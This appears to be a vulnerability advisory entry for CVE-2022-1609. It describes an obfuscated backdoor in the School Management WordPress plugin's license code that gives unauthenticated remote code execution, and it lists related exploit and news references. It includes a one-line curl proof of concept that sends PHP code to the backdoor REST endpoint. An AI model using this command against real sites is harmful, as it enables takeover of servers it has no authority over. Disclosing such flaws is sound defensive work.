Lucene search
Harald EilertsenWPEX-ID:E2D546C9-85B6-47A4-B951-781B9AE5D0F2HistoryMay 18, 2022 - 12:00 a.m.
The School Management < 9.9.7 - Unauthenticated RCE via REST api
2022-05-1800:00:00
Harald Eilertsen
87
0.166 Low
EPSS
Percentile
96.1%
The plugin contains an obfuscated backdoor injected in it’s license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
curl -d 'blowfish=1' -d "blowf=system('id');" 'https://examples.com/wp-json/am-member/license'Related
githubexploit
githubexploit
Exploit for CVE-2022-1609
2022-06-03 02:49:49
Exploit for Code Injection in Weblizar School Management
2022-06-09 14:36:55
Exploit for CVE-2022-1609
2022-06-08 11:28:08
cvelist
cvelist
cve
cve
CVE-2022-1609
2024-01-16 16:15:09
wpvulndb
wpvulndb
The School Management < 9.9.7 - Unauthenticated RCE via REST api
2022-05-18 00:00:00
attackerkb
attackerkb
CVE-2022-1609
2024-01-16 00:00:00
prion
prion
Code injection
2024-01-16 16:15:00
nvd
nvd
CVE-2022-1609
2024-01-16 16:15:09
patchstack
patchstack
thn
thn
Researchers Find Backdoor in School Management Plugin for WordPress
2022-05-21 05:11:00
saint
saint
Weblizar School Management Pro plugin backdoor
2022-08-12 00:00:00
Weblizar School Management Pro plugin backdoor
2022-08-12 00:00:00
nuclei
nuclei
The School Management < 9.9.7 - Remote Code Execution
2022-05-26 06:25:43